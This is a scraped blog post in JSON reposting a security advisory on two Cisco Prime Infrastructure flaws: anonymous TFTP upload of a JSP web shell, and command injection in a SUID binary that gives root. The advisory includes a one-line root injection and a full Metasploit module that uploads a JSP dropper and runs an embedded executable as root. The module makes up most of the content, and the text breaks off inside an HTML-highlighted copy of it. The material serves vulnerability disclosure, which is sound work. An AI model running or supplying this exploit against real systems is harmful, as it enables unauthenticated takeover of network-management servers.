{"id":13520,"date":"2018-10-04T14:19:12","date_gmt":"2018-10-04T22:19:12","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/10\/04\/news-7287\/"},"modified":"2018-10-04T14:19:12","modified_gmt":"2018-10-04T22:19:12","slug":"news-7287","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/10\/04\/news-7287\/","title":{"rendered":"SSD Advisory \u2013 Cisco Prime Infrastructure File Inclusion and Remote Command Execution to Privileges Escalation"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Thu, 04 Oct 2018 05:12:22 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> Cisco Prime Infrastructure (CPI) contains two vulnerabilities that when exploited allow an unauthenticated attacker to achieve root privileges and execute code remotely. The first vulnerability is a file upload vulnerability that allows the attacker to upload and execute JSP files as the Apache Tomcat user. The second vulnerability is a privilege escalation to root by bypassing execution restrictions in a SUID binary.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> Cisco has issued an advisory, https:\/\/tools.cisco.com\/security\/center\/content\/CiscoSecurityAdvisory\/cisco-sa-20181003-pi-tftp, which provides a workaround and a fix for the vulnerability. 
From our assessment, the provided fix only addresses the file uploading part of the exploit, not the file inclusion, the ability to execute arbitrary code through it, or the privilege escalation issue that the product has.<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-15379<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Pedro Ribeiro, has reported this vulnerability to Beyond Security&#8217;s SecuriTeam Secure Disclosure program.<br \/> <span id=\"more-3723\"><\/span><br \/> <strong>Affected systems<\/strong><br \/> Cisco Prime Infrastructure 3.2 and newer<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> <em>First Vulnerability: Arbitrary file upload and execution via tftp and Apache Tomcat<\/em><br \/> Attack Vector: Remote<br \/> Constraints: None<\/p>\n<p>Most web applications running on the CPI virtual appliance are deployed under \/opt\/CSCOlumos\/apache-tomcat-&lt;VERSION&gt;\/webapps. One of these applications is &#8220;swimtemp&#8221;, which symlinks to \/localdisk\/tftp:<\/p>\n<div id=\"crayon-5bb691df2ee90272791562\" class=\"crayon-syntax crayon-theme-shell-default crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">ade # ls -l \/opt\/CSCOlumos\/apache-tomcat-8.5.14\/webapps\/\ntotal 16\ndrwxrwxr-x. 3 root gadmin 4096 Mar 29 19:49 ROOT\ndrwxrwxr-x. 8 root gadmin 4096 Mar 29 21:44 SSO\nlrwxrwxrwx. 1 root gadmin 36 Mar 29 21:32 SSO.war -&gt; \/opt\/CSCOlumos\/wars\/SSO-13.0.201.war\ndrwxrwxr-x. 4 root gadmin 4096 Mar 29 21:45 ifm_poap_rest\nlrwxrwxrwx. 1 root gadmin 45 Mar 29 21:32 ifm_poap_rest.war -&gt; \/opt\/CSCOlumos\/wars\/ifm_poap_rest-3.70.21.war\nlrwxrwxrwx. 1 root gadmin 16 Mar 29 19:49 swimtemp -&gt; \/localdisk\/tftp\/\ndrwxrwxr-x. 22 root gadmin 4096 May 2 15:20 webacsc\nlrwxrwxrwx. 1 root gadmin 30 Mar 29 21:32 webacs.war -&gt; \/opt\/CSCOlumos\/wars\/webacs.war<\/textarea><\/div>\n<\/div>\n<p>As the name implies, this is the directory used by TFTP to store files. 
Cisco has also enabled the upload of files to this directory as TFTPD is started with the -c (file create) flag, and it accepts anonymous connections:<\/p>\n<div id=\"crayon-5bb691df2ee9b504290296\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">\/usr\/sbin\/in.tftpd --ipv4 -vv -c --listen -u prime -a :69 --retransmit 6000000 -s \/localdisk\/tftp<\/textarea><\/div>\n<\/div>\n<p>The TFTPD port (69) is also open to the world in the virtual appliance firewall, so it is trivial to upload a JSP web shell file using a tftp client to the \/localdisk\/tftp\/ directory.<\/p>\n<p>The web shell will then be available at https:\/\/&lt;IP&gt;\/swimtemp\/&lt;SHELL&gt;, and it will execute as the &#8220;prime&#8221; user, which is an unprivileged user that runs the Apache Tomcat server.<\/p>\n<p><em>Second Vulnerability: runrshell Command Injection with root privileges<\/em><br \/> Attack Vector: Local<br \/> Constraints: None<\/p>\n<p>The CPI virtual appliance contains a binary at \/opt\/CSCOlumos\/bin\/runrshell, which has the SUID bit set and executes as root. It is supposed to start a restricted shell that can only execute commands in \/opt\/CSCOlumos\/rcmds. 
The decompiled main() function is shown below:<\/p>\n<div id=\"crayon-5bb691df2eea1194145988\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">\/* Decompiler output: dest marks the start of a stack buffer whose size is not shown in this listing. *\/\nint main(int argc, char **argv, char **envp)\n{\n    char dest;\n    int i;\n\n    setuid(0);   \/* SUID binary: continue as root *\/\n    setgid(0);\n    setenv(\"PATH\", \"\/opt\/CSCOlumos\/rcmds\", 1);   \/* restricted bash may only run commands from rcmds *\/\n    memcpy(&amp;dest, \"\/bin\/bash -r -c \\\"\", 0x12uLL);   \/* 17 characters plus the terminating NUL *\/\n    for ( i = 1; argc - 1 &gt;= i; ++i )\n    {\n        strcat(&amp;dest, argv[i]);   \/* arguments are appended unescaped and without a length check *\/\n        strcat(&amp;dest, \" \");\n    }\n    strcat(&amp;dest, \"\\\"\");\n    return (system(&amp;dest) &amp; 0xFF00) &gt;&gt; 8;   \/* exit status of the shell command *\/\n}<\/textarea><\/div>\n<\/div>\n<p>As 
can be seen above, the binary uses the system() function to execute:<br \/> \/bin\/bash -r -c \"&lt;CMD&gt;\"<br \/> with the PATH set to \/opt\/CSCOlumos\/rcmds and the restricted (-r) flag passed to bash, meaning that only commands in the PATH can be executed, environment variables cannot be changed or set, the directory cannot be changed, etc.<\/p>\n<p>However, due to the way the system() function calls &#8220;bash -c&#8221;, it is trivial to inject a command by forcing an end quote after &lt;CMD&gt; and the bash operator &#8216;&amp;&amp;&#8217;:<br \/> [prime@prime34 ~]$ \/opt\/CSCOlumos\/bin\/runrshell '\" &amp;&amp; \/usr\/bin\/whoami #'<br \/> root<\/p>\n<p><strong>Exploit<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bb691df2eea6742971466\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ##  # This module requires Metasploit: http:\/\/metasploit.com\/download  # Current source: https:\/\/github.com\/rapid7\/metasploit-framework  ##    class MetasploitModule &lt; Msf::Exploit::Remote    Rank = ExcellentRanking      include Msf::Exploit::Remote::HttpClient    include Msf::Exploit::EXE    include Msf::Exploit::FileDropper      def initialize(info = {})      super(update_info(info,        &#8216;Name&#8217;           =&gt; &#8216;Cisco Prime Infrastructure Unauthenticated Remote Code Execution&#8217;,        &#8216;Description&#8217;    =&gt; %q{          Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow          an unauthenticated attacker to achieve remote code execution. The first flaw is a file          upload vulnerability that allows the attacker to upload and execute files as the Apache          Tomcat user; the second is a privilege escalation to root by bypassing execution restrictions          in a SUID binary.            This module exploits these vulnerabilities to achieve unauthenticated remote code execution          as root on the CPI default installation.            This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. 
Earlier and later versions          might also be affected, although 3.4.0.0.348 is the latest at the time of writing.        },        &#8216;Author&#8217;         =&gt;          [            &#8216;Pedro Ribeiro&#8217;        # Vulnerability discovery and Metasploit module          ],        &#8216;License&#8217;        =&gt; MSF_LICENSE,        &#8216;References&#8217;     =&gt;          [            [ &#8216;CVE&#8217;, &#8216;TODO&#8217; ],            [ &#8216;CVE&#8217;, &#8216;TODO&#8217; ],            [ &#8216;URL&#8217;, &#8216;TODO&#8217; ],            [ &#8216;URL&#8217;, &#8216;TODO&#8217; ]          ],        &#8216;Platform&#8217;       =&gt; &#8216;linux&#8217;,        &#8216;Arch&#8217;           =&gt; [ARCH_X86, ARCH_X64],        &#8216;Targets&#8217;        =&gt;          [            [ &#8216;Cisco Prime Infrastructure&#8217;, {} ]          ],        &#8216;Privileged&#8217;     =&gt; true,        &#8216;DefaultOptions&#8217; =&gt; { &#8216;WfsDelay&#8217; =&gt; 10 },        &#8216;DefaultTarget&#8217;  =&gt; 0,        &#8216;DisclosureDate&#8217; =&gt; &#8216;TODO&#8217;      ))        register_options(        [          OptPort.new(&#8216;RPORT&#8217;, [true, &#8216;The target port&#8217;, 443]),          OptPort.new(&#8216;RPORT_TFTP&#8217;, [true, &#8216;TFTPD port&#8217;, 69]),          OptBool.new(&#8216;SSL&#8217;, [true, &#8216;Use SSL connection&#8217;, true]),          OptString.new(&#8216;TARGETURI&#8217;, [ true,  &#8220;swimtemp path&#8221;, &#8216;\/swimtemp&#8217;])        ])    end        def check      res = send_request_cgi({        &#8216;uri&#8217;    =&gt; normalize_uri(datastore[&#8216;TARGETURI&#8217;], &#8216;swimtemp&#8217;),        &#8216;method&#8217; =&gt; &#8216;GET&#8217;      })      if res &amp;&amp; res.code == 404 &amp;&amp; res.body.length == 0        # at the moment this is the best way to detect        # a 404 in swimtemp only returns the error code with a body length of 0,        # while a 404 to another 
webapp or to the root returns code plus a body with content        return Exploit::CheckCode::Detected      else        return Exploit::CheckCode::Unknown      end    end        def upload_payload(payload)      lport = datastore[&#8216;LPORT&#8217;] || (1025 + rand(0xffff-1025))      lhost = datastore[&#8216;LHOST&#8217;] || &#8220;0.0.0.0&#8221;      remote_file = rand_text_alpha(rand(14) + 5) + &#8216;.jsp&#8217;        tftp_client = Rex::Proto::TFTP::Client.new(        &#8220;LocalHost&#8221;  =&gt; lhost,        &#8220;LocalPort&#8221;  =&gt; lport,        &#8220;PeerHost&#8221;   =&gt; rhost,        &#8220;PeerPort&#8221;   =&gt; datastore[&#8216;RPORT_TFTP&#8217;],        &#8220;LocalFile&#8221;  =&gt; &#8220;DATA:#{payload}&#8221;,        &#8220;RemoteFile&#8221; =&gt; remote_file,        &#8220;Mode&#8221;       =&gt; &#8216;octet&#8217;,        &#8220;Context&#8221;    =&gt; {&#8216;Msf&#8217; =&gt; self.framework, &#8216;MsfExploit&#8217; =&gt; self},        &#8220;Action&#8221;     =&gt; :upload      )      print_status &#8220;Uploading TFTP payload to #{rhost}:#{datastore[&#8216;TFTP_PORT&#8217;]} as &#8216;#{remote_file}'&#8221;      tftp_client.send_write_request        remote_file    end      def generate_jsp_payload      exe = generate_payload_exe      base64_exe = Rex::Text.encode_base64(exe)        native_payload_name = rand_text_alpha(rand(6)+3)        var_raw     = rand_text_alpha(rand(8) + 3)      var_ostream = rand_text_alpha(rand(8) + 3)      var_pstream = rand_text_alpha(rand(8) + 3)      var_buf     = rand_text_alpha(rand(8) + 3)      var_decoder = rand_text_alpha(rand(8) + 3)      var_tmp     = rand_text_alpha(rand(8) + 3)      var_path    = rand_text_alpha(rand(8) + 3)      var_tmp2     = rand_text_alpha(rand(8) + 3)      var_path2    = rand_text_alpha(rand(8) + 3)      var_proc2   = rand_text_alpha(rand(8) + 3)        var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)      chmod = %Q|      Process #{var_proc1} = 
Runtime.getRuntime().exec(&#8220;chmod 777 &#8221; + #{var_path} + &#8221; &#8221; + #{var_path2});      Thread.sleep(200);      |        var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)      cleanup = %Q|      Thread.sleep(200);      Process #{var_proc3} = Runtime.getRuntime().exec(&#8220;rm &#8221; + #{var_path} + &#8221; &#8221; + #{var_path2});      |        jsp = %Q|      &lt;%@page import=&#8221;java.io.*&#8221;%&gt;      &lt;%@page import=&#8221;sun.misc.BASE64Decoder&#8221;%&gt;      &lt;%      try {        String #{var_buf} = &#8220;#{base64_exe}&#8221;;        BASE64Decoder #{var_decoder} = new BASE64Decoder();        byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());          File #{var_tmp} = File.createTempFile(&#8220;#{native_payload_name}&#8221;, &#8220;.bin&#8221;);        String #{var_path} = #{var_tmp}.getAbsolutePath();          BufferedOutputStream #{var_ostream} =          new BufferedOutputStream(new FileOutputStream(#{var_path}));        #{var_ostream}.write(#{var_raw});        #{var_ostream}.close();          File #{var_tmp2} = File.createTempFile(&#8220;#{native_payload_name}&#8221;, &#8220;.sh&#8221;);        String #{var_path2} = #{var_tmp2}.getAbsolutePath();          PrintWriter #{var_pstream} =          new PrintWriter(new FileOutputStream(#{var_path2}));        #{var_pstream}.println(&#8220;!#\/bin\/sh&#8221;);        #{var_pstream}.println(&#8220;\/opt\/CSCOlumos\/bin\/runrshell &#8216;\\&#8221; &amp;&amp; &#8221; + #{var_path} + &#8221; #'&#8221;);        #{var_pstream}.close();        #{chmod}          Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path2});        #{cleanup}      } catch (Exception e) {      }      %&gt;      |        jsp = jsp.gsub(\/n\/, &#8221;)      jsp = jsp.gsub(\/t\/, &#8221;)      jsp = jsp.gsub(\/x0dx0a\/, &#8220;&#8221;)      jsp = jsp.gsub(\/x0a\/, &#8220;&#8221;)        return jsp    end        def exploit      jsp_payload = generate_jsp_payload        jsp_name = 
upload_payload(jsp_payload)        # we land in \/opt\/CSCOlumos, so we don&#8217;t know the apache directory      # as it changes between versions&#8230; so leave this commented for now      # &#8230; and try to find a good way to clean it later      # register_files_for_cleanup(jsp_name)        print_status(&#8220;#{peer} &#8211; Executing payload&#8230;&#8221;)      send_request_cgi({        &#8216;uri&#8217;    =&gt; normalize_uri(datastore[&#8216;TARGETURI&#8217;], jsp_name),        &#8216;method&#8217; =&gt; &#8216;GET&#8217;      })        handler    end  end<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-1\"><span class=\"crayon-p\">##<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-2\"><span class=\"crayon-p\"># This module requires Metasploit: http:\/\/metasploit.com\/download<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-3\"><span class=\"crayon-p\"># Current source: https:\/\/github.com\/rapid7\/metasploit-framework<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-4\"><span class=\"crayon-p\">##<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5bb691df2eea6742971466-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-6\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MetasploitModule<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">Remote<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-7\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Rank<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ExcellentRanking<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-9\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">include <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Remote<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">HttpClient<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-10\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">include <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">EXE<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-11\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">include <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span 
class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">FileDropper<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-13\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">initialize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">info<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">super<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">update_info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">info<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Name&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Cisco Prime Infrastructure Unauthenticated Remote Code Execution&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Description&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-e\">q<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Cisco <\/span><span class=\"crayon-e\">Prime <\/span><span class=\"crayon-e\">Infrastructure<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">CPI<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">contains <\/span><span class=\"crayon-e\">two <\/span><span class=\"crayon-e\">basic <\/span><span class=\"crayon-e\">flaws <\/span><span class=\"crayon-e\">that <\/span><span class=\"crayon-e\">when <\/span><span class=\"crayon-e\">exploited <\/span><span class=\"crayon-e\">allow<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-18\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">an <\/span><span class=\"crayon-e\">unauthenticated <\/span><span class=\"crayon-e\">attacker <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">achieve <\/span><span class=\"crayon-e\">remote <\/span><span class=\"crayon-e\">code <\/span><span class=\"crayon-v\">execution<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">first <\/span><span class=\"crayon-e\">flaw <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-19\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">upload <\/span><span 
class=\"crayon-e\">vulnerability <\/span><span class=\"crayon-e\">that <\/span><span class=\"crayon-e\">allows <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">attacker <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">upload <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">execute <\/span><span class=\"crayon-e\">files <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">Apache<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-20\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Tomcat <\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">second <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">privilege <\/span><span class=\"crayon-e\">escalation <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">root <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-e\">bypassing <\/span><span class=\"crayon-e\">execution <\/span><span class=\"crayon-e\">restrictions<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-21\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">SUID <\/span><span class=\"crayon-v\">binary<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5bb691df2eea6742971466-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">This<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">module <\/span><span class=\"crayon-e\">exploits <\/span><span class=\"crayon-e\">these <\/span><span class=\"crayon-e\">vulnerabilities <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">achieve <\/span><span class=\"crayon-e\">unauthenticated <\/span><span class=\"crayon-e\">remote <\/span><span class=\"crayon-e\">code <\/span><span class=\"crayon-e\">execution<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-24\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">root <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">CPI <\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">installation<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">This<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">module <\/span><span class=\"crayon-e\">has <\/span><span class=\"crayon-e\">been <\/span><span class=\"crayon-e\">tested <\/span><span class=\"crayon-e\">with <\/span><span class=\"crayon-i\">CPI<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.2.0.0.258<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.4.0.0.348.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Earlier <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">later <\/span><span class=\"crayon-e\">versions<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-27\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">might <\/span><span class=\"crayon-e\">also <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-v\">affected<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">although<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.4.0.0.348<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">latest <\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">time <\/span><span class=\"crayon-e\">of <\/span><span 